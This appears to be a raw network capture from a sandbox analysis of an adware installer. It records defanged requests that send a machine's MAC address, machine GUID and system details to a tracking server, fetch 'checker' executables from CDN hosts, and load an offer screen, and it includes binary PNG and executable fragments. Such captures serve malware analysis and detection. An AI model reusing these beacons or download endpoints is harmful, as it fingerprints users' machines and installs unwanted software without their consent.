Cache-Control: max-age=604800
Last-Modified: Mon, 05 Aug 2013 17:21:05 GMT
ETag: "f072da2a092ce1:0"
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
Expires: Tue, 15 Dec 2015 00:13:50 GMT
X-Cache: HIT
Accept-Ranges: bytes.PNG........IHDR...Y............m....tEXtSoftware.Adobe ImageReadyq.e&
lt;...;IDATx..Z;o.1..Y.D...W."$=D..*[email protected].
...........;..N.h..=.|..x6..f..pf...n...yX...>z......`87.3...t.e:.s
h..e..z.A....G.p..IZ.z...?Ra8........Y......O.......[[email protected].
...y..-.....Lc.0......O..|z.O/...k.....e...n..!......G.p...9....3. .'?
7 ..GD@..{.<....C$....N.........Q...<.,@...].;Q.'<.(.X.r.,.6.
......QrB..h..d&r....6....G..Shr.... .....4r..= ..f.....B.qP..l.K.....
...YB.Z....H....../:.l.(.S.D...nM7..P.%R........&_uR.H6A..(raP.H9...[\
D. .(....d...`.8.A......r5Q..........:v.e....u.....-&.1.....&.........
Z.|....).L...$....)K%a-....b..a*{<(W..P<..w7_Z.....h.%6.N.......
.*\FB...A...#..f.N...C..(.p...........K.|..5d..3u-........(.k. 7..6..t
svP!.U0.q.......9z.e [email protected]............. .>=...{WVim...
.f.c6.:...|.....0X.yk...../z..!.SHW.d......o.s........a..8..g.|zvg...o
[email protected].^......IEND.B`.....
GET /offers/images/Theme12/button.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 08 Dec 2015 00:13:50 GMT
Content-Type: image/png
Content-Length: 458
Connection: keep-alive
Cache-Control: max-age=604800
Last-Modified: Mon, 05 Aug 2013 17:21:12 GMT
ETag: "1b5642f092ce1:0"
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
Expires: Tue, 15 Dec 2015 00:13:50 GMT
X-Cache: HIT
Accept-Ranges: bytes.PNG........IHDR...Y............m....tEXtSoftware.Adobe ImageReadyq.e&
lt;...lIDATx...1..p....at.`...[_)...&.........~...C..V$z.J.w.Wi.......
.../..<........R.H)s..i....t.....}2M...9i.&..(..c.....l.&.0`.&a..f.
..p...R.Jr....bA....$.....cr....u....sq..x....?..> ..pu`.h..C......
.$w$..gY. .....%9MS...V.....IF'..0].;..HF..]b..Hr..pW...k..{..EQD.....
-L.....#..H.u.. ..lF....j".,<........<. ......18....\.....oI...^
.....:..._......rU.<Z`..d..E.|.0.......B.....IEND.B`.HTTP/1.1 200 O
K..Date: Tue, 08 Dec 2015 00:13:50 GMT..Content-Type: image/png..Conte
nt-Length: 458..Connection: keep-alive..Cache-Control: max-age=604800.
.Last-Modified: Mon, 05 Aug 2013 17:21:12 GMT..ETag: "1b5642f092ce1:0"
..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..Expires: Tue, 15 De
c 2015 00:13:50 GMT..X-Cache: HIT..Accept-Ranges: bytes...PNG........I
HDR...Y............m....tEXtSoftware.Adobe ImageReadyq.e<...lIDATx.
..1..p....at.`...[_)...&.........~...C..V$z.J.w.Wi........../..<...
.....R.H)s..i....t.....}2M...9i.&..(..c.....l.&.0`.&a..f...p...R.Jr...
.bA....$.....cr....u....sq..x....?..> ..pu`.h..C.......$w$..gY. ...
..%9MS...V.....IF'..0].;..HF..]b..Hr..pW...k..{..EQD.....-L.....#..H.u
.. ..lF....j".,<........<. ......18....\.....oI...^.....:..._...
...rU.<Z`..d..E.|.0.......B.....IEND.B`...<<< skipped >>>
GET /Installer/Track?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&reqid=377145248&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&status=2&installedid=29820&z=1&offerscreenid=655&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: srv.DESK-TOP-APP.INFO
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 08 Dec 2015 00:13:47 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 8
Connection: keep-alive..OK..HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/html
; charset=utf-8..Date: Tue, 08 Dec 2015 00:13:47 GMT..Server: Microsof
t-IIS/8.0..X-AspNet-Version: 4.0.30319..X-AspNetMvc-Version: 4.0..X-Po
wered-By: ASP.NET..Content-Length: 8..Connection: keep-alive....OK....
GET /Installer/Flow?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&version=6.12 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: srv.DESK-TOP-APP.INFO
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 08 Dec 2015 00:13:43 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 15979
Connection: keep-alive..Sv.NlmsAxc.2..*.JqaEv`.5. ).Bkmnjf`grQsoa"8,$.Fmkcsez_oajgRvjdo
"8.(.% O_fGew.2.AIBS^?UPM=IM]RMDN Qj^op_o_[XAkd_j.nsv.x FF=TXARLQ
ANRZMN>P.Mnbtu\j`UZJ[hh.PpTW:kfanEnqoYgeco.qbr '.M^eH_x24 5.CDC
VYBQRP@FOXSP?Q.SmalrZpbV[=mgbg.ity.{.HI@QZ<SOLDJT][email protected]_m]WUK^
ck*RsWT<fgdiHjsr\dg^p.len"*.J`imonM]mc.2.:kfan>rmrk`k ).Ono
bp[oBB.4154.3$.:jt[xoOda]m.8-&!EsU\ao?moCmot_gd.3/).DteSMD.3 ensl:
-*Yhbel\hj.a_fhZgi(qq/?habhBfmsni`)]s^ ).DteSMD-.8.bspp8*'\fgdiaen
,^\if_ff-nu-<ed`mAcrprg]&`qc.&!?okhYi]Jfhd.: ..<fgdiCesr
ma]'cu_.)-qdd`gr.',nfp8/32/43.)-s\Wm_p:=G=NL@DZ066 65 (e\dc*^
dbasgl8*.*'o]rri]mXlbq^qrj8`omn7).iebdYghed_q*rs*Ykb-p[uaPmnl]Zah9
skkci5hBA>mNLJ0ok!`sf^< _]BMD=$pcf9$]ZKD@$lpq9$]ZGQK$o_e9764)22$
`bh`=00*3.a^cc925/.ornb7`iiej..% L`earSMD.3 ensl:-*kmo,P?QREP?9O:QOP-_
ok*'j_dblr DwiYhbaL`earQ^j`^l<iebepd\8/12 onobp[obb:,8006!\dlrf
^<-501/!ec^^o927,/!\mrhsnyg_5-/0#mxobgo5. $a`a90$cZ8)$fm`cg;,.q^ppc
nj=4))-.cundnn_g5 .*.L`pe 5%,% >^cetgjf\eB^n`.: .$.:lqcuersn]nKcdEd
us 5.VV ).O]ympl.3 .&!Afd`[obtb.9)1*.HmhklnhknP\l`.8* .Dgn[m^n^hb
uR_o].3 .&!Olc`h<_rblHjsr\dg.8-&!Ripom\eMc`dnCmhe\gbIcma&qu
ot;8imge*.=`jRsi9n<fb]j^ov.2oksb&!NulDf<`eo_roit`Ailr^fkar 5
.,.*.LtjIlM]bnj^lHjsr\dg^p.4!-"*.Hm^Cu_QassglO^pj.9.0 '.KkcBr
dNeqpdoO_iod.: .'.NlmsAxcM]nnjqNdnm 5. .*.JnotCs]M^qrfsRajp].3 -.
.PmnlM^eH_x/2 5.CDCVYBQRP@FOXSP?Q.SmalrZpbV[=mgbg.ity.{.HI@QZ<SOLD
JT][email protected]_m]WUK^ck*RsWT<fgdiHjsr\dg^p.len"*.HjlrO_fGew<<< skipped >>>
GET /Installer/Track?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&reqid=377145248&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&status=2&installedid=10700&z=1&offerscreenid=234&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: srv.DESK-TOP-APP.INFO
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 08 Dec 2015 00:13:47 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 8
Connection: keep-alive..OK..HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/html
; charset=utf-8..Date: Tue, 08 Dec 2015 00:13:47 GMT..Server: Microsof
t-IIS/8.0..X-AspNet-Version: 4.0.30319..X-AspNetMvc-Version: 4.0..X-Po
wered-By: ASP.NET..Content-Length: 8..Connection: keep-alive....OK..
font>....
GET /Installer/Flow?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&version=6.12&nipids=-29408-28693-28657-29219-29736&secondcall=1&reqid=377145248 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
Host: srv.DESK-TOP-APP.INFO
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 08 Dec 2015 00:13:48 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 16974
Connection: keep-alive..Sv.NlmsAxc.2..*.JqaEv`.5. ).Bkmnjf`grQsoa"83$.Fmkcsez_oajgRvjdo
"8.(( .*,3)25(*0.*.LdcKct.5. ).QagI`q1- 7.!("P`hjkrK[la"
;8.9QH ).Onobp[oBB.40("?go\rqL`ear 5('.GpQ`etDjjDgqq[kh"
8,$.>vbOQH"8..'.Cu_TNL0.2..*.=nim_i\Gblb.9."*.Ga_coOQ
H"8.`omn7).ort)K@KTBLC=T?NJQ'alg. oda]ml-Asm]mg^Ga_coMbneci7j
_dblh`=2.)!igam<.92 0( 6332)261-2&06,05&bdkobb: 4.65!d`Zbm7
1515![jnlqlxed;-.-.qvmaet;.*!]d_7/"h`8(!bq^af91$q]mlglh<2./-.`
qrblm]l; .'.P^nd.: ,$.:bacseol\d?Zr^.9.27/(3&0508/-03.00 /31-9
'.<grfphnuq`kM^eH_xo"8..'.N^snqt 5%,% B`eacrdn`.8* .
PpjejmglhQ]tc.2(**.>hocp`h\gavL`pe 5%,% Pfdap?al`kGkms]lj.2 % Scqpu
_gGa_co=nim_i\Gblb.9."*.;\gPrh@oCf`[f[mu.9prs`$.KskCm=gem]nlgs_Hj
sr\dg^p.4!., MmiBlO_fql_mAilr^fkar 5..% MldAxcM]nnjqNdnm 5..% MldAxcM]
nnjqP`huc.2..*.JnotCs]M^qrfsPeph.5. ).Oksr@p`KcpokpV_gm`.8.. .PmnlM^eH
_x/2 5..% MirpRcbC`r41.9."{'s.ImpnDte 5..% MldAxc.2..*.=nipmi
]imRvjd.:/'.HhlfnhvardgiMwm_r.: .'.PbaJay 5.CDCVYBQRP@FOXSP?Q
.SmalrZpbV[=mgbg.ity.{.HI@QZ<SOLDJT][email protected]_m]WUK^ck*RsWT<fgd
iHjsr\dg^p.len"*.J``Ibs50"8.@F>W\=TNRCILZNQBL.Oodoo\kcYV@
iiej.koz.v.DKCTW>NPO?MP_SN=M.Ql`ssap`TWF_ff-NuZW9hbelCmot_gd`k.o`q.
, M]khpqH`ie 5.<fgdiAnoun]m.*.Jqkds^lD= 7,8006'.<eu^srKfd`j.
3.).HoW_dlAhpFhrpajg.5**.?waUPG.5.fqno6/-\ed`m_cm*cbie\bj lt Akd_j=gpn
qeb,`p`.*.?waUPG*.3 ensl:-*Yhbel\hj.a_fhZgi(qq/?habhBfmsni`)]s^ ).Bkmk
\f_Egk_!6"..9hbel>hotpdZ)^vb.,)sgg]im.*'qbr;204*56.,)u<<< skipped >>>
GET /offers/images/Theme12/topLine.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Tue, 08 Dec 2015 00:13:50 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>.. <h2>404 - File or directory not found.</h2
>.. <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......<<< skipped >>>
GET /offers/images/Theme12/bgImg.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Tue, 08 Dec 2015 00:13:50 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>.. <h2>404 - File or directory not found.</h2
>.. <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......<<< skipped >>>
GET /offers/images/Theme12/nextCase.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Tue, 08 Dec 2015 00:13:50 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>.. <h2>404 - File or directory not found.</h2
>.. <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>..HTTP/1.1 404 Not Found..Date: Tue, 08 Dec 2015 00:13:50 GMT..Co
ntent-Type: text/html..Content-Length: 1245..Connection: keep-aliv<<< skipped >>>
GET /Installer/XP/XPLimitChecker.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d2vubraihqcany.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 50053
Connection: keep-alive
Date: Sun, 06 Dec 2015 12:18:40 GMT
Last-Modified: Mon, 04 May 2015 10:45:00 GMT
ETag: "b6631cd12092841cac0763c854828c50"
Accept-Ranges: bytes
Server: AmazonS3
Age: 42429
X-Cache: Hit from cloudfront
Via: 1.1 02fd383853ef3b6dd024813a9b190dcb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pyr3e90V_IFsEoJOWXv-jS_Ov4qsTU7g6_YwSu3oLyvWnBUO-ZqCBw==MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^....... ...0.......p....@.........
.................0...............................................t....
......(C..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected].......
[email protected]....... ...........................rsrc.
..(C.......D...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .<<< skipped >>>
GET /dc.js HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: stats.g.doubleclick.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=10886400
Date: Mon, 07 Dec 2015 22:18:49 GMT
Expires: Tue, 08 Dec 2015 00:18:49 GMT
Last-Modified: Thu, 05 Nov 2015 22:24:16 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 15977
Cache-Control: public, max-age=7200
Age: 6900...........}kW....w~........pk..f......Z.R..Y.C 8i.pi......b..}.>g.
.Kl...}4....d....O...-.....`~...E...]7..>..>....Pf.a.yU."HCC...i
...T*..b.....'..Olf[.Y.[c6P/.....'n.m'..m.... !_XXll..&..(..E..V=/.u.X
..%.w...i..rDoT.....?>z..1`.D...y...y7. \...5ZI...TA..........C...p
3..A..x.k.q4.2...?L.k=.v....4.:sB[...l.w.o {.....?Nc....|..........q..
.......[.n..2..X~.......S.f.]h~....7:.n...m.C#6...........#....y...7.|
..f.W.>..wS......)..Q....i......z......D.`...7N....y.C;....`1....x.
.p.tG.L..=..1r...M..2..)xa...{0!..5...^...7..."..........J8... ...5.O.
...l...r...|....R...P.0ok.8.Z.2....i|...S.y.od...~..k.>.....0vGr.mI
.....0.&&yg.sf2......m.....G=0..B.6..u....A.h.A.0.V.:.-...j..L.....5.E
.[...Q.{2imA......T........~. ...0*%.....>......hX...ga1./$......f.
#..d,.|www5/XX...c5..D-.....p.h..8D.@./.X,.....&gTV..5..,.x..?.....(.&
gt;?6Sy.].`.]...'-"....-...........(.n.@_"p"`.*...T.1.$..t.....o?.."..
/.kX.)[email protected].,HP........# ....d...-,.......-.j..B
S....9...%.~Sug,...`."[email protected]]..yn.i(5.....U.r..$j..0{|.i.5........
H}.......A=..&.Vq....4<..*7c.<b.....OQ8X...&..a/a.....aI.j.7.E.:
cuV=.P.q..d.....X....#[email protected][email protected].#....Q.....K.....
.A.y._....z|..9...9.zM......%m........m).?4.Q...c.....PTDB&..7.-G....E
.....E.7.t.V..G....._..!.....xt..}.......Ev..x..a.{...d.. .q./..OB|.
.6..{....a^.......@?.......o.....*T.;/Oa.......J..........I.)......J..
#..A....FS.....t.H..h...W..|B.~..t.6..........t"<..z..||.......8..B
9......x.a....m.V[.=...K!..\.....w."d...=>.B..(K...u.....~.".@b<<< skipped >>>
GET //offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0& HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: srv.serverdatasrv.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 08 Dec 2015 00:13:47 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 12645
Connection: keep-alive<html>. <head>. <title>5 - NonProduct (Norto
n)</title><script type='text/javascript'>var _gaq = _gaq |
| [];_gaq.push(['_setAccount', 'UA-37348037-1']);_gaq.push(['_setDomai
nName', 'ppdownload.com']);_gaq.push(['_setAllowLinker', true]);..
_gaq.push(['_trackPageview']);
.. (function() {..
var ga = document.createElement('
script'); ga.type = 'text/javascript'; ga.async = true;..
ga.src = ('https:' == document.locati
on.protocol ? 'hXXps://' : 'hXXp://') 'stats.g.doubleclick.net/dc.js
';.. var s = document.get
ElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);..
})();</script><style
type='text/css'>body { width:100%; height:100%; marg
in:0px; padding:0px; font-size:font-family:helvetica; font-size:12px;}
.divLeadpName { border-bottom-style:groove;border-bott
om-width: thin; padding-left:61px; padding-top:9px; font-size:font-fam
ily:helvetica; font-style:italic; font-size:25px; font
-weight:bold; color:black; position:absolute; width: 100%; backgroun
d-color: #fff; ba} #divTop {display: none} #divMiddle
{background-color: #efecec; height: 100%;} #middle {background-colo
r: #fff;} .divOnNext { position:absolute; width:89px<<< skipped >>>
GET /Installer/OperaBrowser/OperaChecker25-6.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.download4desktop.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 08 Dec 2015 00:13:47 GMT
Content-Type: application/octet-stream
Content-Length: 50225
Connection: keep-alive
x-amz-id-2: FjM2eV6EbOb9lBa1hil0WSlWXImFl2jARqyfnJkJ1DA DU8a9tUAgCT9AaGsQU5kRByIh556nHQ=
x-amz-request-id: 4E394D15157A050A
Last-Modified: Wed, 25 Jun 2014 14:41:23 GMT
ETag: "10ffabc748d68c40b68f883058c9b932"
Server: NetDNA-cache/2.2
Content-Disposition: attachment
X-Cache: HIT
Accept-Ranges: bytesMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......PC..............................................................
.............p...............................text...L\.......^........
